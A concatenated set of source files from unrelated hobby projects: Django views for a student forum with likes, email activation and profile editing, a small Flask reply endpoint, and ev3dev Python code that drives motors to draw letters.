if not post.likes.filter(id=request.user.id).exists():
post.likes.add(request.user)
notification = Notification.objects.create(notification_type=1, from_user=request.user, to_user=post.author, post=post)
else:
post.likes.remove(request.user)
next = request.POST.get('next', '/')
return HttpResponseRedirect(next)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class AddDislike(LoginRequiredMixin, View):
def post(self, request, pk, *args, **kwargs):
post = Post.objects.get(pk=pk)
if post.likes.filter(id=request.user.id).exists():
post.likes.remove(request.user)
if not post.dislikes.filter(id=request.user.id).exists():
post.dislikes.add(request.user)
else:
post.dislikes.remove(request.user)
next = request.POST.get('next', '/')
return HttpResponseRedirect(next)
# ===============================Comment Like Functionality=============================
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class AddCommentLike(LoginRequiredMixin, View):
def post(self, request, pk, *args, **kwargs):
comment = Comment.objects.get(pk=pk)
if comment.dislikes.filter(id=request.user.id).exists():
comment.dislikes.remove(request.user)
if not comment.likes.filter(id=request.user.id).exists():
comment.likes.add(request.user)
notification = Notification.objects.create(notification_type=1, from_user=request.user, to_user=comment.author, comment=comment)
else:
comment.likes.remove(request.user)
next = request.POST.get('next', 'post-detail')
return HttpResponseRedirect(next)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class AddCommentDislike(LoginRequiredMixin, View):
def post(self, request, pk, *args, **kwargs):
comment = Comment.objects.get(pk=pk)
if comment.likes.filter(id=request.user.id).exists():
comment.likes.remove(request.user)
if not comment.dislikes.filter(id=request.user.id).exists():
comment.dislikes.add(request.user)
else:
comment.dislikes.remove(request.user)
next = request.POST.get('next', 'post-detail')
return HttpResponseRedirect(next)
def about(request):
return render(request,'blog/about.html',)
```
#### File: icp-forum/users/decorators.py
```python
from django.contrib.auth.models import AnonymousUser
from django.http import HttpResponse
from django.shortcuts import redirect
from django.contrib import messages
from users.models import User
def unauthenticated_user(view_func):
def wrapper_func(request, *args, **kwargs):
if request.user.is_authenticated:
return redirect('blog-home')
else:
return view_func(request, *args, **kwargs)
return wrapper_func
def allowed_users(allowed_roles=[]):
def decorator(view_func):
def wrapper_func(request, *args, **kwargs):
group = None
user = request.user
if request.user.groups.exists():
group= request.user.groups.all()[0].name
if group in allowed_roles:
return view_func(request, *args, **kwargs)
elif(user in User.objects.all()):
messages.success(request, f'Your account has been created for {user}. Follow the verifications process.')
return redirect('logout')
elif(user == AnonymousUser()):
return redirect('login')
else:
print(type(user))
print(user)
return HttpResponse("You're not authorised to enter the platform.")
return wrapper_func
return decorator
```
#### File: icp-forum/users/views.py
```python
from django.shortcuts import render, HttpResponse
from .forms import CertificateForm, EducationForm, ProjectForm, SemesterForm, UserRegisterForm, ProfileUpdateForm
from django.contrib import messages
from django.contrib.auth.decorators import login_required
from django.contrib.auth.models import User
from .decorators import unauthenticated_user, allowed_users
from django.views.generic import CreateView, UpdateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.utils.decorators import method_decorator
from blog.views import is_users
from .models import Education, Certification, Profile, Project, Semester
from django.contrib.auth import get_user_model
from django.utils.http import urlsafe_base64_encode, urlsafe_base64_decode
from django.contrib.sites.shortcuts import get_current_site
from .tokens import account_activation_token
from django.core.mail import send_mail
from django.template.loader import render_to_string
from django.utils.encoding import force_bytes, force_text
from django_project.settings import EMAIL_HOST_USER
@login_required
def resume(request, username, **kwargs):
if request.method == 'GET':
visible_user = User.objects.get(username=username)
userdetail = User.objects.get(username=visible_user)
profiledetail = Profile.objects.get(user=visible_user)
educationdetail = Education.objects.filter(holder=visible_user).order_by('-startYear')
certificatedetail = Certification.objects.filter(holder=visible_user).order_by('-issueDate')
projectdetail = Project.objects.filter(owner=visible_user).order_by('-startDate')
semesterdetail = Semester.objects.filter(owner=visible_user).order_by('-semester')
return render(request,'users/resume.html', {'userdetail': userdetail, 'profiledetail': profiledetail, 'educationdetail':educationdetail, 'certificatedetail':certificatedetail, 'projectdetail': projectdetail, 'semesterdetail': semesterdetail})
@login_required
def result(request, username, **kwargs):
if request.method == 'GET':
visible_user = User.objects.get(username=username)
semesterdetail = Semester.objects.filter(owner=visible_user)
return render(request,'users/sem-result.html', {'semesterdetail': semesterdetail})
@unauthenticated_user
def register(request):
User = get_user_model()
if request.method == 'POST':
form = UserRegisterForm(request.POST)
if form.is_valid():
user = form.save(commit=False)
user.is_active = False
user.save()
current_site = get_current_site(request)
mail_subject = 'Activate your account.'
message = render_to_string('users/acc_active_email.html', {
'user': user,
'domain': current_site.domain,
'uid': urlsafe_base64_encode(force_bytes(user.pk)),
'token': account_activation_token.make_token(user),
})
to_email = form.cleaned_data.get('email')
send_mail(mail_subject, message, EMAIL_HOST_USER, [to_email])
username = form.cleaned_data.get('username')
messages.success(request, f'Account created for {username}, Please get verified yourself by further procedures to enter the platform.')
return HttpResponse('Please confirm your email address to complete the registration')
else:
form = UserRegisterForm()
return render(request, 'users/register.html', {'form': form})
def activate(request, uidb64, token):
User = get_user_model()
try:
uid = force_text(urlsafe_base64_decode(uidb64))
user = User.objects.get(pk=uid)
except(TypeError, ValueError, OverflowError, User.DoesNotExist):
user = None
if user is not None and account_activation_token.check_token(user, token):
user.is_active = True
user.save()
return HttpResponse('Thank you for your email confirmation. Now you can login your account.')
else:
return HttpResponse('Activation link is invalid!')
@login_required
@allowed_users(allowed_roles=['student', 'teacher'])
def profile(request):
if request.method == 'GET':
pform = Profile.objects.get(user=request.user)
eform = Education.objects.filter(holder=request.user)
cform = Certification.objects.filter(holder=request.user)
prform = Project.objects.filter(owner=request.user)
sform = Semester.objects.filter(owner=request.user)
return render(request, 'users/profile.html', {'pform': pform, 'eform': eform, 'cform': cform, 'prform': prform, 'sform': sform})
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class ProfileUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Profile
form_class = ProfileUpdateForm
template_name = 'users/add-update.html'
success_url = '/profile'
success_message = "%(username)s profile has been updated"
def form_valid(self, form):
form.instance.user = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().user, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit profile details'
return context
@login_required
def SearchView(request):
if request.method == 'POST':
query = request.POST.get('search')
print(query)
results = User.objects.filter(username__contains=query)
context = {
'results':results
}
return render(request, 'users/search_result.html', context)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class EducationDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Education
template_name = 'users/delete.html'
context_object_name = 'education'
success_url = '/profile'
def test_func(self):
return is_users(self.get_object().holder, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class EducationCreateView(LoginRequiredMixin, CreateView):
model = Education
form_class = EducationForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.holder = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add education'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class EducationUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Education
form_class = EducationForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.holder = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().holder, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit educational details'
return context
# Certificate view
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class CertificateDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Certification
template_name = 'users/delete.html'
context_object_name = 'certificate'
success_url = '/profile'
def test_func(self):
return is_users(self.get_object().holder, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class CertificateCreateView(LoginRequiredMixin, CreateView):
model = Certification
form_class = CertificateForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.holder = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add certificate'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class CertificateUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Certification
form_class = CertificateForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.holder = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().holder, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit certificate'
return context
# Project view
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class ProjectDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Project
template_name = 'users/delete.html'
context_object_name = 'project'
success_url = '/profile'
def test_func(self):
return is_users(self.get_object().owner, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class ProjectCreateView(LoginRequiredMixin, CreateView):
model = Project
form_class = ProjectForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.owner = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add project'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class ProjectUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Project
form_class = ProjectForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.owner = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().owner, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit project'
return context
# semester view
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class SemesterDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = Semester
template_name = 'users/delete.html'
context_object_name = 'semester'
success_url = '/profile'
def test_func(self):
return is_users(self.get_object().owner, self.request.user)
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class SemesterCreateView(LoginRequiredMixin, CreateView):
model = Semester
form_class = SemesterForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.owner = self.request.user
return super().form_valid(form)
def get_context_data(self, **kwargs):
data = super().get_context_data(**kwargs)
data['tag_line'] = 'Add semester result'
return data
@method_decorator(allowed_users(allowed_roles=['student', 'teacher']), name='dispatch')
class SemesterUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = Semester
form_class = SemesterForm
template_name = 'users/add-update.html'
success_url = '/profile'
def form_valid(self, form):
form.instance.owner = self.request.user
return super().form_valid(form)
def test_func(self):
return is_users(self.get_object().owner, self.request.user)
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['tag_line'] = 'Edit semester result'
return context
``` |
{
"source": "1noro/dam2-proyecto-final",
"score": 2
} |
#### File: dam2-proyecto-final/code/post-reply.py
```python
@app.route('/<slug>/thread/<thread_id>', methods=['POST'])
def post_reply(slug, thread_id):
formData = request.get_json()
mydb = get_mydb()
mycursor = mydb.cursor()
args = (
formData['author'],
formData['comment'],
formData['imageurl'],
thread_id
)
mycursor.callproc('insert_post', args)
mycursor.close()
mydb.close()
return app.response_class(
response = '{"info": "posted"}',
status = 201,
mimetype = 'application/json'
)
```
#### File: dam2-proyecto-final/code/ThreadDTO.py
```python
class ThreadDTO:
def __init__(self, id, subject, author, comment, fileurl, published, sticky, closed):
self.id = id;
self.subject = subject;
self.author = author;
self.comment = comment;
self.fileurl = fileurl;
self.published = published.strftime('%c');
self.sticky = sticky;
self.closed = closed;
def to_JSON(self):
return json.dumps(self, default=lambda o: o.__dict__)
``` |
{
"source": "1nt3rnal3rr0r/robotics",
"score": 3
} |
#### File: robotics/controller/letters.py
```python
from time import sleep
from ev3dev.ev3 import *
xMotor = LargeMotor('outC')
yMotor = LargeMotor('outB')
zMotor = MediumMotor('outA')
touchSensor = TouchSensor('in2')
whiteApproximation = 180
timeT = 1200
speed = 100
speedBackwards = -100
def printA():
#pen on paper
penToPaper()
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT/1000)
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT/1000)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
yMotor.run_timed(time_sp=timeT/4, speed_sp=speed)
sleep(timeT / 4000)
yMotor.run_timed(time_sp=timeT / 4 + timeT + timeT / 4, speed_sp=speedBackwards)
sleep(timeT / 4000 + timeT/1000 + timeT / 4000)
#pen out of power
penOutOfPaper()
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
spacing()
print ("A")
def printB():
# pen on paper
penToPaper()
yMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
sleep(timeT/2000)
xMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT/2000)
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT/2000)
xMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
sleep(timeT / 2000)
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
xMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# pen out of power
penOutOfPaper()
# spacing
spacing()
print ("B")
def printC():
# pen on paper
penToPaper()
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT/1000)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("C")
def printD():
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# pen on paper
penToPaper()
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("D")
def printE():
# pen on paper
penToPaper()
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#|
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#-
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
spacing()
print ("E")
def printF():
# pen on paper
penToPaper()
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("F")
def printG():
# pen on paper
penToPaper()
#|
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#|
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#|
yMotor.run_timed(time_sp=timeT , speed_sp=speedBackwards)
sleep(timeT / 1000)
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# pen out of power
penOutOfPaper()
# spacing
spacing()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
print ("G")
def printH():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("H")
def printI():
# pen on paper
penToPaper()
# -
print("-")
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# pen out of power
print("pen out")
penOutOfPaper()
# spacing
print("spacing")
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT/1000)
# pen in of power
print("pen out")
penOutOfPaper()
print ("I")
def newLine():
# pen out of power
print("pen out")
zMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT*14, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT*3, speed_sp=speedBackwards)
sleep(timeT / 1000*14)
def printDot():
# pen on paper
# penToPaper()
# .
print(".")
yMotor.run_timed(time_sp=timeT/12, speed_sp=speed)
sleep(timeT / 12000)
# pen out of power
print("pen out")
penOutOfPaper()
# spacing
print("spacing")
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
# pen in of power
print("pen in")
penToPaper()
print ("I")
def printJ():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print ("J")
def printK():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# \
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("K")
def printL():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("L")
def printM():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# \
printBackSlash()
# /
printFrontSlash()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("M")
def printN():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# \
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("N")
def printO():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("O")
def printP():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("P")
def printQ():
printO()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# \
yMotor.run_timed(time_sp=timeT / 3, speed_sp=speed)
xMotor.run_timed(time_sp=timeT / 3, speed_sp=speed)
sleep(timeT / 3000)
# spacing
spacing()
# pen out of power
penOutOfPaper()
print("Q")
def printR():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# spacing
spacing()
print("R")
def printS():
# pen on paper
penToPaper()
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
#-
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#|
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
spacing()
print("S")
def printT():
# pen on paper
penToPaper()
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# spacing
spacing()
print("T")
def printU():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("U")
def printV():
# pen on paper
penToPaper()
# \
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#/
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("V")
def printW():
# pen on paper
penToPaper()
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# /
xMotor.run_timed(time_sp=timeT/2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
# \
xMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT/2, speed_sp=speed)
sleep(timeT / 2000)
# |
yMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("W")
def printX():
# pen on paper
penToPaper()
# \
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# \
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
sleep(timeT / 2000)
# /
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 2000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("X")
def printY():
# pen on paper
penToPaper()
# \
printBackSlash()
# /
printFrontSlash()
#/
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("Y")
def printZ():
penToPaper()
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# /
xMotor.run_timed(time_sp=timeT, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
# -
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT / 1000)
#pen out of power
penOutOfPaper()
# spacing
spacing()
print("Z")
def printBackSlash():
# \
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 1000)
#/
def printFrontSlash():
xMotor.run_timed(time_sp=timeT / 2, speed_sp=speedBackwards)
yMotor.run_timed(time_sp=timeT / 2, speed_sp=speed)
sleep(timeT / 1000)
def penToPaper():
print()
while(not touchSensor.is_pressed):
zMotor.run_timed(time_sp=timeT/4, speed_sp=speedBackwards)
sleep(timeT / 4000)
def penOutOfPaper():
print()
zMotor.run_timed(time_sp=3 * timeT, speed_sp=speed)
sleep(timeT / 333)
def spacing():
print("spacing")
xMotor.run_timed(time_sp=timeT, speed_sp=speed)
sleep(timeT/1000)
def beginningOfThePage():
xMotor.run_timed(time_sp=timeT*14, speed_sp=speedBackwards)
sleep((timeT*14)/1000)
```
#### File: robotics/controller/message.py
```python
class Message:
def __init__(self, language, content):
self._language = language
self._content = content
def get_content(self):
return self._content
def get_language(self):
return self._language
``` |
{
